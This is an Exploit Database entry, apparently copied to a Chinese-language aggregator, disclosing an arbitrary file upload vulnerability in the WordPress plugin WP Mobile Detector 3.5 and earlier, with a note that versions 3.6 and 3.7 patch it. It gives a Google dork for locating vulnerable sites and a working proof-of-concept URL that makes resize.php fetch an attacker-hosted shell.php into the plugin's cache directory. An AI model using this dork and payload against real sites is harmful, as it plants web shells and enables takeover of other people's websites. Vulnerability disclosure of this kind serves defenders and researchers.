WordPress Plugin WP Mobile Detector 3.5 – Arbitrary File Upload

• Exploit Database
• 17 阅读

• 作者： Aaditya Purani
  日期： 2016-06-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39891/

• #Exploit Title: WP Mobile Detector <=3.5 Arbitrary File upload
  #Google Dork: inurl: /wp-includes/plugins/wp-mobile-detector
  #Date: 1-06-2015
  #Exploit Author: Aaditya Purani
  #Author Details: https://aadityapurani.com
  #Vendor: https://wordpress.org/plugins/wp-mobile-detector/changelog
  #Version: 3.5
  #Tested on: Kali Linux 2.0 Sana / Windows 10
  
  
  This Vulnerable has been disclosed to public yesterday about WP Mobile
  Detector Arbitrary File upload for version <=3.5 in which attacker can
  upload malicious PHP Files (Shell) into the Website. Over 10,000 users are
  affected, Vendor has released a Patch in their version 3.6 & 3.7 at
  https://wordpress.org/plugins/wp-mobile-detector/changelog/ .
  
  I have wrote a Complete POC post:
  
  WP Mobile Detector Vulnerability <= 3.5 Exploit POC
  
  
  I have made a POC Video Here:
  https://www.youtube.com/watch?v=ULE1AVWfHTU
  
  Simple POC:
  
  Go to: 
  
  [wordpress sitempath].com/wp-content/plugins/wp-mobile-detector/resize.php?src=[link to your shell.php]
  
  and it will get saved in directory:
  
  /wp-content/plugins/wp-mobile-detector/cache/shell.php